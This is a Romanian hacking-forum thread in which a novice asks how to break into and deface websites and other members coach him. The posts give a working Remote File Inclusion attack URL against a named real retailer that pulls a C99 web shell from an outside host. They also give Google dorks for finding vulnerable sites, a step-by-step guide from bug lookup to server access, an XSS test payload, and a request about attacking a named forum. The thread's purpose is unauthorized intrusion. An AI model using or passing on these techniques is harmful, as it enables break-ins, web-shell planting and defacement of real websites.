Hacking and more...
HaCkinG CulT
|
Nou pe simpatie: glamour35
 | Femeie 24 ani Constanta cauta Barbat 28 - 69 ani |
|
|
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #27 |
|
|
Acum de unde iau C99Shell care sa mearga si care sa nu fie text ci sa fie cam ca aici http://img388.imageshack.us/img388/5003/c9928xp.jpg Cu asta ma ajuta cineva ????? OSHO - u chiar te pricepi ,te rog ajutama cu chesti asta !!!sau altcineva care se pricepe !!!!
|
|
| |
|
| #28 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|
| #30 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|
| #31 |
|
|
OSHO a scris:
@streptococ: asta e gluma sau tu chiar esti serios ?
Come on, chestiile astea is char lame de tot. Daca site-ul nu e vulnerabil RFI ce ai facut ? Te opresti ? Atat ? Te dai batut daca nu e vulnerabil la RFI ? Daca nu e vulnerabil la RFI inseamna ca ai gasit un site hack-proof ?
Scuza-ma ca imi permit sa ma amuz pe seama ta dar te credeam mult mai "greu" in gandire.
@Maniak: uite, ai vazut ca a venit unul care sa-ti dea mura-n gura ?  |
lol OSHO,eu i-am vorbit mai jos decat unui incepator dupa ce am vazut ca nu e in stare nici sa gaseasca un php shell si i am recomandat cea mai usoara metoda si cea mai folosita de toti lamerii , am incercat sa il fac sa intelega nu cum fac majoritatea ii insira 10 limbaje de programare si "go". Crezi ca mai intelegea ceva daca ii insiram 10 metode ? Nu inteleg de ce te-ai amuzat ? probabil crezi ca doar atat stiu , sa folosesc un RFI.
_______________________________________ Retired !
|
|
| |
|
| #33 |
|
|
OSH acum intelesei ce trebuia sa fac ex : LINCK SITE VURNERABIL: /components/com_facileforms/facileforms.frame.php?ff_compath=
GOOGLE DORK: inurl"com_facileforms"
Shall : http://popesculescu.lx.ro/c99.txt?
Cam asta trebe sa arata sitele cu toate chestiile astea EX :www.flanco.ro/components/com_facileforms/facileforms.frame.php?ff_compath=http://popesculescu.lx.ro/c99.txt?
Dar cum mai gasesc alt linc de sit vurnerabil
|
|
| |
|
| #34 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
Maniak a scris:
Dar cum mai gasesc alt linc de sit vurnerabil |
Poti folosi o tehnica folosita de lameri, adica google dorks. Asta se foloseste cand vrei sa demonstrezi ca esti lamer. Intri pe google si ii dai sa caute (asta e doar un exemplu): inurl:php?page=
Daca nu vrei sa fi lamer faci cateva teste sa vezi ca ai prins ideea si apoi pastrezi tehnica pentru cazul in care gasesti vreun site pe care vrei sa intri si care vezi ca e vulnerabil la RFI. Cea mai simpla metoda sa iti dai seama daca e vulnerabil la RFI e sa te uiti in URL. Daca vezi un nume de fisier in URL poti incerca sa incluzi C99 pentru ca e posibil sa fie RFI. Alte metode de RFI o sa gasesti mai incolo... sa dai fisierele de incarcare prin POST sau prin COOKIE. Alea is chestii pentru care trebuie sa mai inveti putin (nu mult) ca sa le poti aplica si trebuie sa inveti destul de mult ca sa stii sa le gasesti.
_______________________________________
 IPFind: IP Finder and browser revealer SkullBox: IT pentru incepatori _______________________________________
|
|
| |
|
| #35 |
rakonPe lista neagra
Postari: 261
|
|
streptococ a scris:
Ce dreq il puneti sa invete o gramada de limbaje de programare si de scripting cand el nu intelege cateva tehnici simple dar un limbaj. + pentru a face un deface nu iti trebuie absolut deloc cunostinte PHP iar mysql ..tu Sketch ai idee despre mysql ? iti spun eu nu ai nici o idee daca aveai nu ziceai ca tre sa stii mysql pentru a face un deface. Pentru a face un deface poti sa ai si un IQ de 0,1.Tre doar sa stii 2 coduri html pentru deface si sa dai pe google dupa dork or sa scanezi cu scanner buguri RFI. Mai citii mai sus unul de zicea de php,mysql,js,C,perl etc. o sumedenie de limbaje de programare si scripting pe care nu le-ar invata nici in 2 luni.Rakon tu ai inteles vreodata in viata ta un exploit ?
Maniak uite cum sta treaba pe intelesul tau.
1. cauta un bug [ sa fie Remote File Inclusion ] pe un site de securitate gen milw0rm,securityfocus,secunia etc. 2.vezi daca bugul are google dork daca nu ia numele softului afectat si versiunea si cauta pe google. 3.ai gasit cu google un soft cu versiunea afectata , acum e timpul sa incluzi php shellu in site`u vuln 4. ai obtinut acces la server 5. cauta unde ai drepturi de scriere si gata
unde e PHP`ul,MYSQL`u,C,Perl si toate cele ca sa penetrezi serveru` ? |
Daca am inteles vreodata un exploit ? Da , am inteles . Dar uite , gasesti o vulnerabilitate in www.blabla.com , si nu exista exploit momentan pentru aceasta vulnerabilitate , atunci trebuie sa-ti faci tu propriul exploit , de aia spuneam de un limbaj de programare ( gen C ) . Asa , si cu limbajele de web , deoarece trebuie sa stii sa te si uiti prin codul sursa , sal intelegi , sa iti bagi nasul prin baza de date .
Calm dude 
|
|
| |
|
| #36 |
|
|
rakon stii ca exploiturile se scriu pe baza unor buguri, pentru ce iti trebuie sa codezi/folosesti exploit cand poti folosii bugul si fara ?
| Dar uite , gasesti o vulnerabilitate in www.blabla.com , si nu exista exploit momentan pentru aceasta vulnerabilitate , atunci trebuie sa-ti faci tu propriul exploit |
Habar n-ai ce e ala un exploit si cu ce se mananca ! Daca gasesti o vulnerabilitate te folosesti de ea si iti ridici nivelul de drepturi nu te apuci sa cauti/faci un exploit .Exploiturile sunt pentru cei grei de cap care nu inteleg cum sa exploatez o vulnerabilitate si prefera exploiturile ca sunt usor de folosit unde doar le executa,introduc url`ul la site-ul vuln si apoi pot executa comenzi doar din consola. Nu zic ca exploiturile nu sunt folositoare,uneori chiar sunt necesare de exemplu pot executa aceeasi comanda de 999 ori [ adica repetata ] DAR nu cum crezi tu ca totul se rezulta la exploituri  Pe scurt: Daca stii sa folosesti un bug nu ai nevoie de exploit ! ! !
deoarece trebuie sa stii sa te si uiti prin codul sursa , sal intelegi , sa iti bagi nasul prin baza de date .
|
tipule lasa-te ca nu e de tine, daca taceai filozof ramaneai ! la paginile codate in PHP nu ai cum sa vezi codul sursa ! iar la celelalte nu prea te ar interesa codul + daca webmasterul a folosit si un encoder gen Zend te poti uita la codul sursa ca la stele si nu vei intelege nimic 
PS:
OSHO a scris:
"Vrei sa fi hacker ? G00gl3 d0rkz + RFI r00lz !" |
ala nu ii hacker , ci doar un amarat de lamer/defacer care polueaza internetul.
_______________________________________ Retired !
|
|
| |
|
| #37 |
|
|
Alta tehnica de spart site ,in cazul ka sitele nu e vulnerabil RFT mai exista !?? Si cum se face ???? Ca tahnica asta cu RTF am prinso !!!!!
|
|
| |
|
| #38 |
|
|
Maniak a scris:
Alta tehnica de spart site ,in cazul ka sitele nu e vulnerabil RFT mai exista !?? Si cum se face ???? Ca tahnica asta cu RTF am prinso !!!!! |
RFT?? E clar ca ai inteles'o Ps: citeste ce a scris OSHO mai sus
OSHO a scris:
sa dai fisierele de incarcare prin POST sau prin COOKIE. Alea is chestii pentru care trebuie sa mai inveti putin (nu mult) ca sa le poti aplica si trebuie sa inveti destul de mult ca sa stii sa le gasesti. |
|
|
| |
|
| #39 |
|
|
Mah poi cum mai gasesc si eu un bug care sa fie Remote File Inclusion cu tot cu google dork cu care sa sparg site ???
|
|
| |
|
| #40 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
Maniak a scris:
Mah poi cum mai gasesc si eu un bug care sa fie Remote File Inclusion cu tot cu google dork cu care sa sparg site ??? |
Ai citit ce ti-am spus mai sus ? Adica eu iti spun ce ai de facut si apoi ma intrebi ce ai de facut... crezi ca o sa te mai ajute cineva daca vede ca nu citesti ce ti se spune ? 
_______________________________________
 IPFind: IP Finder and browser revealer SkullBox: IT pentru incepatori _______________________________________
|
|
| |
|
| #41 |
hfhunElite Member
Postari: 593
|
|
|
| |
|
| #42 |
|
|
Nu vreau decat sa sparg siteuri si sa le fac deface ,vreu si sa invat si ceva serios !!!
|
|
| |
|
| #43 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|
| #44 |
|
|
Merci mult OSHO chiar o sa invat ce mi-ai dat pentru ca ma descurc cu engleza !!!Dar mai am o nelamurire (ultima nelamurire ) pe care ai incercat tu mai sus sa imi explici dar nu am inteles : cum gasec un linc cu site vulnerabil, da si mie un exemplu de linck ca sa pot si eu sa gasesc !!!!!
|
|
| |
|
| #45 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|
| #46 |
|
|
Buguri care sa fie Remote File Inclusion pentru a le sparge cu Shell se gasesc pentru orice site ???? Si pentru " Bulletin® Version 3.6.4 " siteul este www.craiovaforum.ro
|
|
| |
|
| #47 |
|
|
OSHO --> revin din nou cu problema mea cu scanatul. Am inteles de la tine ca nici un soft nu ar fi recomandat pentru scanat pentru ca lasa urme foarte mari in log, pana aici este clar. Intrebare mea este ce metoda sa folosesc ca sa vad ce vulnerabiitati are ?? 
_______________________________________

|
|
| |
|
| #48 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
Well... dupa ce ai invatat bine metodele iti folosesti ochii :P
Cand vezi intr-un site ca toate URL-urile au forma index.php?pagina=contact.html nu iti mai trebuie nici un fel de program ca sa iti dai seama ca siteul ala (in majoritatea cazurilor) e vulnerabil RFI sau LFI. De asemenea, unde vezi un camp input care urmeaza sa fie prelucrat de server si rezultatul il vezi pe pagina urmatoare e destul sa adaugi acolo <script>alert('Bau bau !');</script> ca sa iti dai seama daca siteul e vulnerabil XSS sau nu. Exemple mai sunt, dar cred ca ai prins ideea 
_______________________________________
 IPFind: IP Finder and browser revealer SkullBox: IT pentru incepatori _______________________________________
|
|
| |
|
| #49 |
|
|
mai exista posibilitatea ca , codul sa fie vuln la RFI dar totusi sa nu poti face nimic daca url fopen e setat 0ff in php.ini 
_______________________________________ Retired !
|
|
| |
|
| #50 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|